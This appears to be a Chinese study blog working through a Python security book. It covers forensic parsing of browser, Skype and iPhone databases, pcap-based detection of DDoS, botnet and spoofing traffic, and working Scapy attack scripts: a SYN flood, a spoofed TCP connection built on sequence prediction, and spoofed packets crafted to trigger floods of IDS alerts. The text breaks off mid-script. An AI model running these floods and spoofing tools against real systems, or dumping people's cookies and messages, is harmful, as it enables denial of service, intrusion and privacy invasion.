parser = optparse.OptionParser("[*]Usage: python skype.py -p ")
parser.add_option('-p', dest='pathName', type='string', help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print '[!] Path Does Not Exist: ' + pathName
exit(0)
else:
skypeDB = os.path.join(pathName, 'main.db')
if os.path.isfile(skypeDB):
printProfile(skypeDB)
printContacts(skypeDB)
printCallLog(skypeDB)
printMessages(skypeDB)
else:
print '[!] Skype Database ' + 'does not exist: ' + skpeDB
if __name__ == '__main__':
main()
这里直接用该书作者提供的数据包进行测试:
在Windows7以上的系统中,Firefox的sqlite文件保存在类似如下的目录中:C:\Users\win7\AppData\Roaming\Mozilla\Firefox\Profiles\8eogekr4.default
主要关注这几个文件:cookie.sqlite、places.sqlite、downloads.sqlite
然而在最近新的几个版本的Firefox中已经没有downloads.sqlite这个文件了,具体换成哪个文件可以自己去研究查看一下即可。
#!/usr/bin/python
#coding=utf-8
import re
import optparse
import os
import sqlite3
# 解析打印downloads.sqlite文件的内容,输出浏览器下载的相关信息
def printDownloads(downloadDB):
conn = sqlite3.connect(downloadDB)
c = conn.cursor()
c.execute('SELECT name, source, datetime(endTime/1000000, \'unixepoch\') FROM moz_downloads;')
print '\n[*] --- Files Downloaded --- '
for row in c:
print '[+] File: ' + str(row[0]) + ' from source: ' + str(row[1]) + ' at: ' + str(row[2])
# 解析打印cookies.sqlite文件的内容,输出cookie相关信息
def printCookies(cookiesDB):
try:
conn = sqlite3.connect(cookiesDB)
c = conn.cursor()
c.execute('SELECT host, name, value FROM moz_cookies')
print '\n[*] -- Found Cookies --'
for row in c:
host = str(row[0])
name = str(row[1])
value = str(row[2])
print '[+] Host: ' + host + ', Cookie: ' + name + ', Value: ' + value
except Exception, e:
if 'encrypted' in str(e):
print '\n[*] Error reading your cookies database.'
print '[*] Upgrade your Python-Sqlite3 Library'
# 解析打印places.sqlite文件的内容,输出历史记录
def printHistory(placesDB):
try:
conn = sqlite3.connect(placesDB)
c = conn.cursor()
c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;")
print '\n[*] -- Found History --'
for row in c:
url = str(row[0])
date = str(row[1])
print '[+] ' + date + ' - Visited: ' + url
except Exception, e:
if 'encrypted' in str(e):
print '\n[*] Error reading your places database.'
print '[*] Upgrade your Python-Sqlite3 Library'
exit(0)
# 解析打印places.sqlite文件的内容,输出百度的搜索记录
def printBaidu(placesDB):
conn = sqlite3.connect(placesDB)
c = conn.cursor()
c.execute("select url, datetime(visit_date/1000000, 'unixepoch') from moz_places, moz_historyvisits where visit_count > 0 and moz_places.id==moz_historyvisits.place_id;")
print '\n[*] -- Found Baidu --'
for row in c:
url = str(row[0])
date = str(row[1])
if 'baidu' in url.lower():
r = re.findall(r'wd=.*?\&', url)
if r:
search=r[0].split('&')[0]
search=search.replace('wd=', '').replace('+', ' ')
print '[+] '+date+' - Searched For: ' + search
def main():
parser = optparse.OptionParser("[*]Usage: firefoxParse.py -p ")
parser.add_option('-p', dest='pathName', type='string', help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
elif os.path.isdir(pathName) == False:
print '[!] Path Does Not Exist: ' + pathName
exit(0)
else:
downloadDB = os.path.join(pathName, 'downloads.sqlite')
if os.path.isfile(downloadDB):
printDownloads(downloadDB)
else:
print '[!] Downloads Db does not exist: '+downloadDB
cookiesDB = os.path.join(pathName, 'cookies.sqlite')
if os.path.isfile(cookiesDB):
pass
printCookies(cookiesDB)
else:
print '[!] Cookies Db does not exist:' + cookiesDB
placesDB = os.path.join(pathName, 'places.sqlite')
if os.path.isfile(placesDB):
printHistory(placesDB)
printBaidu(placesDB)
else:
print '[!] PlacesDb does not exist: ' + placesDB
if __name__ == '__main__':
main()
上述脚本对原本的脚本进行了一点修改,修改的地方是对查找Google搜索记录部分改为对查找Baidu搜索记录,这样在国内更普遍使用~
运行结果:
除了downloads.sqlite文件找不到外,其他的文件都正常解析内容了。在查找搜索内容部分,若为中文等字符则显示为编码的形式。
没有iPhone :-) ,有的自己测试一下吧 。
#!/usr/bin/python
#coding=utf-8
import os
import sqlite3
import optparse
def isMessageTable(iphoneDB):
try:
conn = sqlite3.connect(iphoneDB)
c = conn.cursor()
c.execute('SELECT tbl_name FROM sqlite_master WHERE type==\"table\";')
for row in c:
if 'message' in str(row):
return True
except:
return False
def printMessage(msgDB):
try:
conn = sqlite3.connect(msgDB)
c = conn.cursor()
c.execute('select datetime(date,\'unixepoch\'), address, text from message WHERE address>0;')
for row in c:
date = str(row[0])
addr = str(row[1])
text = row[2]
print '\n[+] Date: '+date+', Addr: '+addr + ' Message: ' + text
except:
pass
def main():
parser = optparse.OptionParser("[*]Usage: python iphoneParse.py -p ")
parser.add_option('-p', dest='pathName', type='string',help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
else:
dirList = os.listdir(pathName)
for fileName in dirList:
iphoneDB = os.path.join(pathName, fileName)
if isMessageTable(iphoneDB):
try:
print '\n[*] --- Found Messages ---'
printMessage(iphoneDB)
except:
pass
if __name__ == '__main__':
main()
需要下载安装pygeoip,可以pip install pygeoip或者到Github上下载安装https://github.com/appliedsec/pygeoip
同时需要下载用pygeoip操作的GeoLiteCity数据库来解压获得GeoLiteCity.dat数据库文件:
http://dev.maxmind.com/geoip/legacy/geolite/
将GeoLiteCity.dat放在脚本的同一目录中直接调用即可。
#!/usr/bin/python
#coding=utf-8
import pygeoip
# 查询数据库相关的城市信息并输出
def printRecord(tgt):
rec = gi.record_by_name(tgt)
city = rec['city']
# 原来的代码为 region = rec['region_name'],已弃用'region_name'
region = rec['region_code']
country = rec['country_name']
long = rec['longitude']
lat = rec['latitude']
print '[*] Target: ' + tgt + ' Geo-located. '
print '[+] '+str(city)+', '+str(region)+', '+str(country)
print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long)
gi = pygeoip.GeoIP('GeoLiteCity.dat')
tgt = '173.255.226.98'
printRecord(tgt)
运行结果:
需要安装dpkt包:pip install dpkt
dpkt允许逐个分析抓包文件里的各个数据包,并检查数据包中的每个协议层。
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
def printPcap(pcap):
# 遍历[timestamp, packet]记录的数组
for (ts, buf) in pcap:
try:
# 获取以太网部分数据
eth = dpkt.ethernet.Ethernet(buf)
# 获取IP层数据
ip = eth.data
# 把存储在inet_ntoa中的IP地址转换成一个字符串
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
print '[+] Src: ' + src + ' --> Dst: ' + dst
except:
pass
def main():
f = open('geotest.pcap')
pcap = dpkt.pcap.Reader(f)
printPcap(pcap)
if __name__ == '__main__':
main()
因为抓取的流量不多,直接使用书上的数据包来测试即可:
接着添加retGeoStr()函数,返回指定IP地址对应的物理位置,简单地解析出城市和三个字母组成的国家代码并输出到屏幕上。整合起来的代码如下:
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import pygeoip
import optparse
gi = pygeoip.GeoIP('GeoLiteCity.dat')
# 查询数据库相关的城市信息并输出
def printRecord(tgt):
rec = gi.record_by_name(tgt)
city = rec['city']
# 原来的代码为 region = rec['region_name'],已弃用'region_name'
region = rec['region_code']
country = rec['country_name']
long = rec['longitude']
lat = rec['latitude']
print '[*] Target: ' + tgt + ' Geo-located. '
print '[+] '+str(city)+', '+str(region)+', '+str(country)
print '[+] Latitude: '+str(lat)+ ', Longitude: '+ str(long)
def printPcap(pcap):
# 遍历[timestamp, packet]记录的数组
for (ts, buf) in pcap:
try:
# 获取以太网部分数据
eth = dpkt.ethernet.Ethernet(buf)
# 获取IP层数据
ip = eth.data
# 把存储在inet_ntoa中的IP地址转换成一个字符串
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
print '[+] Src: ' + src + ' --> Dst: ' + dst
print '[+] Src: ' + retGeoStr(src) + '--> Dst: ' + retGeoStr(dst)
except:
pass
# 返回指定IP地址对应的物理位置
def retGeoStr(ip):
try:
rec = gi.record_by_name(ip)
city = rec['city']
country = rec['country_code3']
if city != '':
geoLoc = city + ', ' + country
else:
geoLoc = country
return geoLoc
except Exception, e:
return 'Unregistered'
def main():
parser = optparse.OptionParser('[*]Usage: python geoPrint.py -p ')
parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
(options, args) = parser.parse_args()
if options.pcapFile == None:
print parser.usage
exit(0)
pcapFile = options.pcapFile
f = open(pcapFile)
pcap = dpkt.pcap.Reader(f)
printPcap(pcap)
if __name__ == '__main__':
main()
还是使用之前测试用的数据包:
这里修改一下代码,将kml代码直接写入一个新文件中而不是直接输出到控制台。
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import pygeoip
import optparse
gi = pygeoip.GeoIP('GeoLiteCity.dat')
# 通过IP地址的经纬度构建kml结构
def retKML(ip):
rec = gi.record_by_name(ip)
try:
longitude = rec['longitude']
latitude = rec['latitude']
kml = (
'\n'
'%s \n'
'\n'
'%6f,%6f \n'
' \n'
' \n'
) %(ip,longitude, latitude)
return kml
except:
return ' '
def plotIPs(pcap):
kmlPts = ''
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
srcKML = retKML(src)
dst = socket.inet_ntoa(ip.dst)
dstKML = retKML(dst)
kmlPts = kmlPts + srcKML + dstKML
except:
pass
return kmlPts
def main():
parser = optparse.OptionParser('[*]Usage: python googleearthPrint.py -p ')
parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
(options, args) = parser.parse_args()
if options.pcapFile == None:
print parser.usage
exit(0)
pcapFile = options.pcapFile
f = open(pcapFile)
pcap = dpkt.pcap.Reader(f)
kmlheader = '\
\n\n\n'
kmlfooter = ' \n \n'
kmldoc = kmlheader + plotIPs(pcap) + kmlfooter
# print kmldoc
with open('googleearthPrint.kml', 'w') as f:
f.write(kmldoc)
print "[+]Created googleearthPrint.kml successfully"
if __name__ == '__main__':
main()
运行结果:
查看该kml文件:
接着访问谷歌地球:https://www.google.com/earth/
在左侧选项中导入kml文件:
导入后点击任一IP,可以看到该IP地址的定位地图:
LOIC,即Low Orbit Ion Cannon低轨道离子炮,是用于压力测试的工具,通常被攻击者用来实现DDoS攻击。
一个比较可靠的LOIC下载源:https://sourceforge.net/projects/loic/
由于下载源站点已从HTTP升级为HTTPS,即已经无法直接通过抓包来进行请求头的分析了。
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
def findDownload(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
# 获取TCP数据
tcp = ip.data
# 解析TCP中的上层协议HTTP的请求
http = dpkt.http.Request(tcp.data)
# 若是GET方法,且请求行中包含“.zip”和“loic”字样则判断为下载LOIC
if http.method == 'GET':
uri = http.uri.lower()
if '.zip' in uri and 'loic' in uri:
print "[!] " + src + " Downloaded LOIC."
except:
pass
f = open('download.pcap')
pcap = dpkt.pcap.Reader(f)
findDownload(pcap)
这里直接使用书上提供的数据包进行测试:
下面的代码主要用于检测僵尸网络流量中的IRC命令:
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
def findHivemind(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
sport = tcp.sport
# 若目标端口为6667且含有“!lazor”指令,则确定是某个成员提交一个攻击指令
if dport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued by: '+src
print '[+] Target CMD: ' + tcp.data
# 若源端口为6667且含有“!lazor”指令,则确定是服务器在向HIVE中的成员发布攻击的消息
if sport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued to: '+src
print '[+] Target CMD: ' + tcp.data
except:
pass
f = open('hivemind.pcap')
pcap = dpkt.pcap.Reader(f)
findHivemind(pcap)
同样直接用案例的数据包来测试:
主要通过设置检测不正常数据包数量的阈值来判断是否存在DDoS攻击。
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
# 默认设置检测不正常数据包的数量的阈值为1000
THRESH = 1000
def findAttack(pcap):
pktCount = {}
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
# 累计各个src地址对目标地址80端口访问的次数
if dport == 80:
stream = src + ':' + dst
if pktCount.has_key(stream):
pktCount[stream] = pktCount[stream] + 1
else:
pktCount[stream] = 1
except:
pass
for stream in pktCount:
pktsSent = pktCount[stream]
# 若超过设置检测的阈值,则判断为进行DDoS攻击
if pktsSent > THRESH:
src = stream.split(':')[0]
dst = stream.split(':')[1]
print '[+] ' + src + ' attacked ' + dst + ' with ' + str(pktsSent) + ' pkts.'
f = open('attack.pcap')
pcap = dpkt.pcap.Reader(f)
findAttack(pcap)
同样直接用案例的数据包来测试:
然后将前面的代码整合到一起:
#!/usr/bin/python
#coding=utf-8
import dpkt
import socket
import optparse
# 默认设置检测不正常数据包的数量的阈值为1000
THRESH = 1000
def findDownload(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
# 获取TCP数据
tcp = ip.data
# 解析TCP中的上层协议HTTP的请求
http = dpkt.http.Request(tcp.data)
# 若是GET方法,且请求行中包含“.zip”和“loic”字样则判断为下载LOIC
if http.method == 'GET':
uri = http.uri.lower()
if '.zip' in uri and 'loic' in uri:
print "[!] " + src + " Downloaded LOIC."
except:
pass
def findHivemind(pcap):
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
sport = tcp.sport
# 若目标端口为6667且含有“!lazor”指令,则确定是某个成员提交一个攻击指令
if dport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued by: '+src
print '[+] Target CMD: ' + tcp.data
# 若源端口为6667且含有“!lazor”指令,则确定是服务器在向HIVE中的成员发布攻击的消息
if sport == 6667:
if '!lazor' in tcp.data.lower():
print '[!] DDoS Hivemind issued to: '+src
print '[+] Target CMD: ' + tcp.data
except:
pass
def findAttack(pcap):
pktCount = {}
for (ts, buf) in pcap:
try:
eth = dpkt.ethernet.Ethernet(buf)
ip = eth.data
src = socket.inet_ntoa(ip.src)
dst = socket.inet_ntoa(ip.dst)
tcp = ip.data
dport = tcp.dport
# 累计各个src地址对目标地址80端口访问的次数
if dport == 80:
stream = src + ':' + dst
if pktCount.has_key(stream):
pktCount[stream] = pktCount[stream] + 1
else:
pktCount[stream] = 1
except:
pass
for stream in pktCount:
pktsSent = pktCount[stream]
# 若超过设置检测的阈值,则判断为进行DDoS攻击
if pktsSent > THRESH:
src = stream.split(':')[0]
dst = stream.split(':')[1]
print '[+] ' + src + ' attacked ' + dst + ' with ' + str(pktsSent) + ' pkts.'
def main():
parser = optparse.OptionParser("[*]Usage python findDDoS.py -p -t ")
parser.add_option('-p', dest='pcapFile', type='string', help='specify pcap filename')
parser.add_option('-t', dest='thresh', type='int', help='specify threshold count ')
(options, args) = parser.parse_args()
if options.pcapFile == None:
print parser.usage
exit(0)
if options.thresh != None:
THRESH = options.thresh
pcapFile = options.pcapFile
# 这里的pcap文件解析只能调用一次,注释掉另行修改
# f = open(pcapFile)
# pcap = dpkt.pcap.Reader(f)
# findDownload(pcap)
# findHivemind(pcap)
# findAttack(pcap)
with open(pcapFile, 'r') as f:
pcap = dpkt.pcap.Reader(f)
findDownload(pcap)
with open(pcapFile, 'r') as f:
pcap = dpkt.pcap.Reader(f)
findHivemind(pcap)
with open(pcapFile, 'r') as f:
pcap = dpkt.pcap.Reader(f)
findAttack(pcap)
if __name__ == '__main__':
main()
由于这部分作者没有给示例数据包,那就自己来合并上述几个pcap文件,使用命令:
mergecap -a -F pcap -w traffic.pcap download.pcap hivemind.pcap attack.pcap
-a参数指定按照命令顺序来合并各个pcap文件(不添加-a参数则默认按照时间的顺序合并),-F参数指定生成的文件类型,-w参数指定生成的pcap文件。
运行结果:
TTL即time-to-live,由8比特组成,可以用来确定在到达目的地之前数据包经过了几跳。当计算机发送一个IP数据包时会设置TTL字段为数据包在到达目的地之前所应经过的中继跳转的上限值,数据包每经过一个路由设备,TTL值就自减一,若减至0还未到目的地,路由器会丢弃该数据包以防止无限路由循环。
Nmap进行伪装扫描时,伪造数据包的TTL值是没有经过计算的,因而可以利用TTL值来分析所有来自Nmap扫描的数据包,对于每个被记录为Nmap扫描的源地址,发送一个ICMP数据包来确定源地址与目标机器之间隔了几跳,从而来辨别真正的扫描源。
Nmap的-D参数实现伪造源地址扫描:nmap 192.168.220.128 -D 8.8.8.8
Wireshark抓包分析,加上过滤器的条件“ip.addr==8.8.8.8”,发现确实是有用伪造源地址进行扫描:
点击各个数据包查看TTL值:
可以看到默认扫描的Nmap扫描,其ttl值是随机的。
添加-ttl参数指定值为13之后,可以看到发送的数据包的ttl值都为13:
这里使用Scapy库来获取源地址IP及其TTL值。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
# 检查数据包的IP层,提取出源IP和TTL字段的值
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src
ttl = str(pkt.ttl)
print "[+] Pkt Received From: " + ipsrc + " with TTL: " + ttl
except:
pass
def main():
sniff(prn=testTTL, store=0)
if __name__ == '__main__':
main()
运行脚本监听后,启动Nmap伪造源地址扫描即可看到如下结果:
接着添加checkTTL()函数,主要实现对比TTL值进行源地址真伪判断:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
import time
import optparse
# 为避免IPy库中的IP类与Scapy库中的IP类冲突,重命名为IPTEST类
from IPy import IP as IPTEST
ttlValues = {}
THRESH = 5
# 检查数据包的IP层,提取出源IP和TTL字段的值
def testTTL(pkt):
try:
if pkt.haslayer(IP):
ipsrc = pkt.getlayer(IP).src
ttl = str(pkt.ttl)
checkTTL(ipsrc, ttl)
except:
pass
def checkTTL(ipsrc, ttl):
# 判断是否是内网私有地址
if IPTEST(ipsrc).iptype() == 'PRIVATE':
return
# 判断是否出现过该源地址,若没有则构建一个发往源地址的ICMP包,并记录回应数据包中的TTL值
if not ttlValues.has_key(ipsrc):
pkt = sr1(IP(dst=ipsrc) / ICMP(), retry=0, timeout=1, verbose=0)
ttlValues[ipsrc] = pkt.ttl
# 若两个TTL值之差大于阈值,则认为是伪造的源地址
if abs(int(ttl) - int(ttlValues[ipsrc])) > THRESH:
print '\n[!] Detected Possible Spoofed Packet From: ' + ipsrc
print '[!] TTL: ' + ttl + ', Actual TTL: ' + str(ttlValues[ipsrc])
def main():
parser = optparse.OptionParser("[*]Usage python spoofDetect.py -i -t ")
parser.add_option('-i', dest='iface', type='string', help='specify network interface')
parser.add_option('-t', dest='thresh', type='int', help='specify threshold count ')
(options, args) = parser.parse_args()
if options.iface == None:
conf.iface = 'eth0'
else:
conf.iface = options.iface
if options.thresh != None:
THRESH = options.thresh
else:
THRESH = 5
sniff(prn=testTTL, store=0)
if __name__ == '__main__':
main()
运行脚本监听后,启动Nmap伪造源地址扫描即可看到如下结果:
下面用nslookup命令来进行一次域名查询:
Wireshark抓包如下:
可以看到客户端发送DNSQR请求包,服务器发送DNSRR响应包。
一个DNSQR包含有查询的名称qname、查询的类型qtype、查询的类别qclass。
一个DNSRR包含有资源记录名名称rrname、类型type、资源记录类别rtype、TTL等等。
解析pcap文件中所有含DNSRR的数据包,提取分别含有查询的域名和对应的IP的rrname和rdata变量,然后建立一个索引字典并对字典中未出现的IP添加到数组中。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
dnsRecords = {}
def handlePkt(pkt):
# 判断是否含有DNSRR
if pkt.haslayer(DNSRR):
rrname = pkt.getlayer(DNSRR).rrname
rdata = pkt.getlayer(DNSRR).rdata
if dnsRecords.has_key(rrname):
if rdata not in dnsRecords[rrname]:
dnsRecords[rrname].append(rdata)
else:
dnsRecords[rrname] = []
dnsRecords[rrname].append(rdata)
def main():
pkts = rdpcap('fastFlux.pcap')
for pkt in pkts:
handlePkt(pkt)
for item in dnsRecords:
print "[+] " + item + " has " + str(len(dnsRecords[item])) + " unique IPs."
# for i in dnsRecords[item]:
# print "[*] " + i
# print
if __name__ == '__main__':
main()
用书上的数据包进行测试:
通常,Conficker会在感染的几小时内生成许多DNS域名,但很多域名都是假的,目的是为了掩盖真正的命令与控制服务器,因而需要寻找的就是那些对未知域名查询回复出错信息的服务器响应包。
这里只检查服务器53端口的数据包,DNS数据包有个rcode字段,当其值为3时表示域名不存在。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def dnsQRTest(pkt):
# 判断是否含有DNSRR且存在UDP端口53
if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53:
rcode = pkt.getlayer(DNS).rcode
qname = pkt.getlayer(DNSQR).qname
# 若rcode为3,则表示该域名不存在
if rcode == 3:
print '[!] Name request lookup failed: ' + qname
return True
else:
return False
def main():
unAnsReqs = 0
pkts = rdpcap('domainFlux.pcap')
for pkt in pkts:
if dnsQRTest(pkt):
unAnsReqs = unAnsReqs + 1
print '[!] ' + str(unAnsReqs) + ' Total Unanswered Name Requests'
if __name__ == '__main__':
main()
书上示例数据包测试结果:
TCP序列号预测利用的是原本设计用来区分各个独立的网络连接的TCP序列号的生成缺乏随机性这一缺陷。
使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。
先确认目标主机开启了513端口,然后进行SYN洪泛攻击:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def synFlood(src, tgt):
# TCP源端口不断自增一,而目标端口513不变
for sport in range(1024, 65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
src = "192.168.220.132"
tgt = "192.168.220.128"
synFlood(src, tgt)
运行结果:
主要通过发送TCP SYN数据包来从依次收到的SYN/ACK包中计算TCP序列号之差,查看是否存在可被猜测的规律。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
for x in range(1, 5):
if preNum != 0:
preNum = seqNum
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
seqNum = ans.getlayer(TCP).seq
diffSeq = seqNum - preNum
print '[+] TCP Seq Difference: ' + str(diffSeq)
return seqNum + diffSeq
tgt = "192.168.220.128"
seqNum = calTSN(tgt)
print "[+] Next TCP Sequence Number to ACK is: " + str(seqNum + 1)
运行结果:
应该是存在问题的,修改一下输出看看:
可以看到preNum的值都为0,应该是代码中的逻辑出现问题了。
稍微修改一下代码:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
# 重复4次操作
for x in range(1,5):
# 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值
# 逻辑出现问题
# if preNum != 0:
if seqNum != 0:
preNum = seqNum
# 构造并发送TCP SYN包
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
# 读取SYN/ACK包的TCP序列号
seqNum = ans.getlayer(TCP).seq
if preNum != 0:
diffSeq = seqNum - preNum
print "[*] preNum: %d seqNum: %d" % (preNum, seqNum)
print "[+] TCP Seq Difference: " + str(diffSeq)
print
return seqNum + diffSeq
tgt = "192.168.220.128"
seqNum = calTSN(tgt)
print "[+] Next TCP Sequence Number to ACK is: " + str(seqNum + 1)
运行结果:
可以看到,TCP序列号结果是随机的,即目标主机不存在该漏洞。
添加伪造TCP连接的spoofConn()函数,整合为一体,主要过程为先对远程服务器进行SYN洪泛攻击、使之拒绝服务,然后猜测TCP序列号并伪造TCP连接去跟目标主机建立TCP连接。
这里的代码只是简单实现了当时实现攻击的场景,现在由于TCP序列号的随机性已经比较难进行TCP猜测攻击了。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def synFlood(src, tgt):
# TCP源端口不断自增一,而目标端口513不变
for sport in range(1024, 65535):
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=sport, dport=513)
pkt = IPlayer / TCPlayer
send(pkt)
def calTSN(tgt):
seqNum = 0
preNum = 0
diffSeq = 0
# 重复4次操作
for x in range(1,5):
# 若不是第一次发送SYN包,则设置前一个序列号值为上一次SYN/ACK包的序列号值
# 逻辑出现问题
# if preNum != 0:
if seqNum != 0:
preNum = seqNum
# 构造并发送TCP SYN包
pkt = IP(dst=tgt) / TCP()
ans = sr1(pkt, verbose=0)
# 读取SYN/ACK包的TCP序列号
seqNum = ans.getlayer(TCP).seq
if preNum != 0:
diffSeq = seqNum - preNum
print "[*] preNum: %d seqNum: %d" % (preNum, seqNum)
print "[+] TCP Seq Difference: " + str(diffSeq)
print
return seqNum + diffSeq
# 伪造TCP连接
def spoofConn(src, tgt, ack):
# 发送TCP SYN包
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514)
synPkt = IPlayer / TCPlayer
send(synPkt)
# 发送TCP ACK包
IPlayer = IP(src=src, dst=tgt)
TCPlayer = TCP(sport=513, dport=514, ack=ack)
ackPkt = IPlayer / TCPlayer
send(ackPkt)
def main():
parser = optparse.OptionParser('[*]Usage: python mitnickAttack.py -s -S -t ')
parser.add_option('-s', dest='synSpoof', type='string', help='specifc src for SYN Flood')
parser.add_option('-S', dest='srcSpoof', type='string', help='specify src for spoofed connection')
parser.add_option('-t', dest='tgt', type='string', help='specify target address')
(options, args) = parser.parse_args()
if options.synSpoof == None or options.srcSpoof == None or options.tgt == None:
print parser.usage
exit(0)
else:
synSpoof = options.synSpoof
srcSpoof = options.srcSpoof
tgt = options.tgt
print '[+] Starting SYN Flood to suppress remote server.'
synFlood(synSpoof, srcSpoof)
print '[+] Calculating correct TCP Sequence Number.'
seqNum = calTSN(tgt) + 1
print '[+] Spoofing Connection.'
spoofConn(srcSpoof, tgt, seqNum)
print '[+] Done.'
if __name__ == '__main__':
main()
运行结果:
测试时直接将发包数量设置小一点从而更好地看到输出结果。
这里IDS使用的是snort,本小节主要是通过分析snort的规则,制造假的攻击迹象来触发snort的警报,从而让目标系统产生大量警告而难以作出合理的判断。
先来查看snort的ddos规则:
vim /etc/snort/rules/ddos.rules
然后输入:/icmp_id:678 来直接查找
看到可以利用的触发警报的规则DDoS TFN探针:ICMP id为678,ICMP type为8,内容含有“1234”。其他的特征也按照规则下面的构造即可。只要构造这个ICMP包并发送到目标主机即可。
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
# 触发DDoS警报
def ddosTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
send(pkt, iface=iface, count=count)
src = "192.168.220.132"
dst = "192.168.220.129"
iface = "eth0"
count = 1
ddosTest(src, dst, iface, count)
运行结果:
检查snort警报日志,可以看到四个数据包都被IDS检测到并产生了警报:
snort -q -A console -i eth2 -c /etc/snort/snort.conf
输入上述命令查看日志期间可能会报错,如:
ERROR: /etc/snort/rules/community-smtp.rules(13) => !any is not allowed
ERROR: /etc/snort/rules/community-virus.rules(19) => !any is not allowed
这时就输入命令:vim /etc/snort/snort.conf,注释掉/etc/snort/rules/community-smtp.rules 和 /etc/snort/rules/community-virus.rules所在行即可。
再来查看snort的exploit.rules文件中的警报规则:
vim /etc/snort/rules/exploit.rules
然后输入:/EXPLOIT ntalkd x86 Linux overflow 来查找
可以看到,含有框出的指定字节序列就会触发警报。
为了生成含有该指定字节序列的数据包,可以使用符号\x,后面跟上该字节的十六进制值。注意的是其中的“89|F|”在Python中写成“\x89F”即可。
# 触发exploits警报
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
send(pkt, iface=iface, count=count)
接着伪造踩点或扫描的操作来触发警报。
查看snort的exploit.rules文件中的警报规则:
vim /etc/snort/rules/scan.rules
然后输入:/Amanda 来查找
可以看到,只要数据包中含有框出的特征码即可触发警报。
# 触发踩点扫描警报
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
send(pkt, iface=iface, count=count)
现在整合所有的代码,生成可以触发DDoS、exploits以及踩点扫描警报的数据包:
-s参数指定发送的源地址,这里伪造源地址为1.2.3.4,-c参数指定发送的次数、只是测试就只发送一次即可。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
from random import randint
# 触发DDoS警报
def ddosTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / ICMP(type=8, id=678) / Raw(load='1234')
